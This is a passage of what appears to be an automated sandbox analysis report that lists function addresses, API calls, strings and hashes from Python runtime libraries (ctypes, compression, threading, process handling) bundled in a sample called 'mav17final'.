                                                  • Instruction ID: d973590822f973e82b2581121b1dd5b14d8310139aa4b54b5502fda92f660f16
                                                  • Opcode Fuzzy Hash: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
                                                  • Instruction Fuzzy Hash: 01519F62A19A8792EE24DB58E9916B96360FF44FC4F404172DF8E43B65DF3DE505E300
                                                  Function 00007FF8BA246B5C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BE1
                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BEF
                                                  • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C08
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C1A
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C60
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                  • String ID: api-ms-
                                                  • API String ID: 916704608-2084034818
                                                  • Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                  • Instruction ID: 0771b9e065c90a80d88598f58949237012481d065dc9b33f3a9b18f847fe1681
                                                  • Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                  • Instruction Fuzzy Hash: 6B31DC21B1EB4292EE26AB0AE9045B53394FF48FE4F594575EF2D0A790EF3CE145A300
                                                  Function 00007FF8B9F621A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$CallDict_Err_MakeMallocMem_MemoryObject_Update
                                                  • String ID: X{}
                                                  • API String ID: 3445980372-2140212134
                                                  • Opcode ID: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
                                                  • Instruction ID: 3128b050b6f6a3f2ebe16aed0699aede4295e08bb5f836d30b8bdbd26fc827c9
                                                  • Opcode Fuzzy Hash: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
                                                  • Instruction Fuzzy Hash: 56312A31A09BC285FB558F69E9442B927A0AF4ABF2F586134DB8D477A4DF3CE494C700
                                                  Function 00007FF8B9F61860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$AttrCallable_CheckErr_LookupObject_String
                                                  • String ID: restype must be a type, a callable, or None
                                                  • API String ID: 1528254987-4008198047
                                                  • Opcode ID: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
                                                  • Instruction ID: 1975a5e84f3a2d6c9cd0c80d8aadc5794b1d7bbee8079d641dcafcc33e7bebe2
                                                  • Opcode Fuzzy Hash: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
                                                  • Instruction Fuzzy Hash: EA311C22F09B8681EB958F6DE55037927A0EF46BF6F18A230CB4E467A4DE2CE455C300
                                                  Function 00007FF8B90CC5F8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                  • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                  • API String ID: 1563898963-3455802345
                                                  • Opcode ID: 9b026c52384d1bde9e7588ce781edc70c1283e8086e1dddbc8207b2c901252c2
                                                  • Instruction ID: 6d304ea10122de307ea4596ba87b4384328a026709fb82eca05caca142f7fd89
                                                  • Opcode Fuzzy Hash: 9b026c52384d1bde9e7588ce781edc70c1283e8086e1dddbc8207b2c901252c2
                                                  • Instruction Fuzzy Hash: 9A314B21B09A9682EE14CF19E5501386374FB58FE4B545A31EF6E477E4DF2CE45A8300
                                                  Function 00007FF8B9073870 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$AffinityErrorLastMaskOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 1247319315-2746090705
                                                  • Opcode ID: 84f84ba0d819ed7d28646b2aec9722d2b2c98135e418c2544e8b5fc9a2d70430
                                                  • Instruction ID: daff56ebe09004aeac0dc40ecd47d4e021ac928488347e2de5472d41cdfcb7a4
                                                  • Opcode Fuzzy Hash: 84f84ba0d819ed7d28646b2aec9722d2b2c98135e418c2544e8b5fc9a2d70430
                                                  • Instruction Fuzzy Hash: 55213061B0C6C782FF509F29F8441B96BA0BF687E4F444035DB0D426A5EE3CE4468700
                                                  Function 00007FF8B9073F20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CountErrorLastOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 109548231-2746090705
                                                  • Opcode ID: b0a74a816b2bb0a02e08803a7b868286cc248dab37cbd7a49b6cc2d8dbfba7cb
                                                  • Instruction ID: a33078c0f798c9d0a1067c3a6ce8023fc7486bf994ef4533aeaacbb1c95fe51a
                                                  • Opcode Fuzzy Hash: b0a74a816b2bb0a02e08803a7b868286cc248dab37cbd7a49b6cc2d8dbfba7cb
                                                  • Instruction Fuzzy Hash: E7215321B1C68782FF549F2DF8842796BA0BFA87E1F444435DB1E46695EE2CE8478700
                                                  Function 00007FF8B9073960 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$AffinityErrorLastMaskOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 1247319315-2746090705
                                                  • Opcode ID: f36405a96407f5c48ff1cffe12eb7f8d1e535dd237c7df921e92d8a611183e99
                                                  • Instruction ID: 46fa7b2bed2cc9bb6c48239a2f8b8b854c1e3d1eaddae641222f3864abc8423a
                                                  • Opcode Fuzzy Hash: f36405a96407f5c48ff1cffe12eb7f8d1e535dd237c7df921e92d8a611183e99
                                                  • Instruction Fuzzy Hash: B7212F21B1868782FE549F2EF8942796BA1BFA8BE0F445035DB1E43795EE2CE4568700
                                                  Function 00007FF8B9073480 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ClassErrorLastOpenPriorityProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3190793011-2746090705
                                                  • Opcode ID: 0d9471339f1e42a836f56fddc6e67cca189d308aee44e2c9fee917e893e7b78b
                                                  • Instruction ID: d12eb60a518b9bece97dd77f89e2f37fb4f5dedaff425ecc3e073c91ba3d2ebb
                                                  • Opcode Fuzzy Hash: 0d9471339f1e42a836f56fddc6e67cca189d308aee44e2c9fee917e893e7b78b
                                                  • Instruction Fuzzy Hash: F5215321B0868782FF549F2EF8841796BA0BFA8BE0F485035DB1E47694DE2CE4878700
                                                  Function 00007FF8B90733A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ClassErrorLastOpenPriorityProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3190793011-2746090705
                                                  • Opcode ID: 5ed11432822b2ab59c5525e06913b4ea131950c1beaa857bc16ccadd49b4e221
                                                  • Instruction ID: a7a89bc6611d2b181eafbfc9a1309b0be9f6665c7c66bdde3ddbfca973315d23
                                                  • Opcode Fuzzy Hash: 5ed11432822b2ab59c5525e06913b4ea131950c1beaa857bc16ccadd49b4e221
                                                  • Instruction Fuzzy Hash: DE214221F1868782FF559F3EF8541795AA1BFA87E0F485035DB1E82695EE2CE8478700
                                                  Function 00007FF8B9F6B5AC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CharErr_Unicode_Wide$FormatString
                                                  • String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
                                                  • API String ID: 530648689-1577475929
                                                  • Opcode ID: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
                                                  • Instruction ID: bb5d0fd9a5c2d09a8eb7fddce825e67a35475bcbd983c74b127afe78d197e4ea
                                                  • Opcode Fuzzy Hash: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
                                                  • Instruction Fuzzy Hash: B0213A61B0CB8282EA40CF69E5801B96761BF85FE2F585536DB0D47768CF2CE445C700
                                                  Function 00007FF8B9F6EBE4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Long$Long_MaskUnsigned
                                                  • String ID: _ctypes/cfield.c pymem$unicode string or integer address expected instead of %s instance
                                                  • API String ID: 1805849926-901310697
                                                  • Opcode ID: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
                                                  • Instruction ID: 4e1087973d4edae19115757ad5be9f6d11511a5cf81da1063b2d959eaf9a7f1f
                                                  • Opcode Fuzzy Hash: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
                                                  • Instruction Fuzzy Hash: DB11EF62A09FC291EA448F1DE8542782B71BF59BE6F546436DB4E47354EF3CE465C300
                                                  Function 00007FF8B90C37BC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lockmemmove
                                                  • String ID: End of stream already reached
                                                  • API String ID: 4192957916-3466344095
                                                  • Opcode ID: 9d24e192cd5e41aae34a11841e36e0bc5166bdf8702469d9357772ef0d70671f
                                                  • Instruction ID: adc327de9edfa78a92e601dc295ba21b4cf0366cb5c954a7e433ba870a84c9f7
                                                  • Opcode Fuzzy Hash: 9d24e192cd5e41aae34a11841e36e0bc5166bdf8702469d9357772ef0d70671f
                                                  • Instruction Fuzzy Hash: 4E11F866A18A8296EE14DF6AE954269A774FB88FC4F084031DF5E43765CF3CE45AC310
                                                  Function 00007FF8B90C26EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lock
                                                  • String ID: Compressor has been flushed
                                                  • API String ID: 1906554297-3904734015
                                                  • Opcode ID: 4f10c9a98a270c81542dec47670a47e5c1056ddde1cac534f6d7ef28f75aec1e
                                                  • Instruction ID: 7d1b6395c6fd282176b252082ac702063d7391978b89c733a0c227a9f19fc1ae
                                                  • Opcode Fuzzy Hash: 4f10c9a98a270c81542dec47670a47e5c1056ddde1cac534f6d7ef28f75aec1e
                                                  • Instruction Fuzzy Hash: CA11C271A08A8292EE10DF6AE9841696375FB99FC5B049432DF4E47B54CF3CE49AC350
                                                  Function 00007FF8B9098E10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyThread_acquire_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E36
                                                  • PyThread_release_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E68
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E98
                                                    • Part of subcall function 00007FF8B9098364: PyType_GetModuleState.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B909839F
                                                    • Part of subcall function 00007FF8B9098364: PyBytes_FromStringAndSize.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B90983B3
                                                    • Part of subcall function 00007FF8B9098364: PyList_New.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B90983C9
                                                    • Part of subcall function 00007FF8B9098364: PyEval_SaveThread.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B9098417
                                                    • Part of subcall function 00007FF8B9098364: PyEval_RestoreThread.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B9098431
                                                  • PyEval_SaveThread.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B50
                                                  • PyThread_acquire_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B65
                                                  • PyEval_RestoreThread.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B90A4B6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072699078.00007FF8B9091000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8B9090000, based on PE: true
                                                  • Associated: 00000002.00000002.2072666393.00007FF8B9090000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072810626.00007FF8B90B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9090000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
                                                  • String ID: Compressor has been flushed
                                                  • API String ID: 3871537485-3904734015
                                                  • Opcode ID: b7deaa72277dee5a18a2e9f9e61238a57d26c55f915241b82e5b3f83901528c3
                                                  • Instruction ID: c4dcfa9bda82f5b0681acc4ed4e2c8b6398b9b58bd05841a21788d6b0bbd017a
                                                  • Opcode Fuzzy Hash: b7deaa72277dee5a18a2e9f9e61238a57d26c55f915241b82e5b3f83901528c3
                                                  • Instruction Fuzzy Hash: 7711E631A0CAC282EE54CF2AE8542696369FB88FD0F049031DF4E47B64DF3CE4668781
                                                  Function 00007FF8B90C2134 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_SizeThread_release_lock
                                                  • String ID: Repeated call to flush()
                                                  • API String ID: 3236580226-194442007
                                                  • Opcode ID: a7363f18bb3a4be2b1f04e20a3cf77806fbf112a27042f4a7a0e0242247e6c36
                                                  • Instruction ID: cd87e8e4ed6f07260ef04e642ee0a1153c0d6c3adf0844a083fce0007cc86775
                                                  • Opcode Fuzzy Hash: a7363f18bb3a4be2b1f04e20a3cf77806fbf112a27042f4a7a0e0242247e6c36
                                                  • Instruction Fuzzy Hash: A511E231A08A9292EE149F2AE9542796379FB99BC1F048031DF1E47B55CF2CE49AC750
                                                  Function 00007FF8B9F6F574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_$CharFormatStringUnicode_Wide
                                                  • String ID: one character unicode string expected$unicode string expected instead of %s instance
                                                  • API String ID: 3624372013-2255738861
                                                  • Opcode ID: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
                                                  • Instruction ID: 1dd96d3e3fd3e99ab087cae9edb4c8873ea97c0089d15b171be716a7983555d4
                                                  • Opcode Fuzzy Hash: a442bb40f20c3a4dd4081ba5bcb0ae0298b6afa5f68cd383e2f326c911a818c9
                                                  • Instruction Fuzzy Hash: FB11FB76A08F8291EB848F29E8541792760EF4AFF6F686032DB0E47764DE2CD894C300
                                                  Function 00007FF8B9F6DC30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
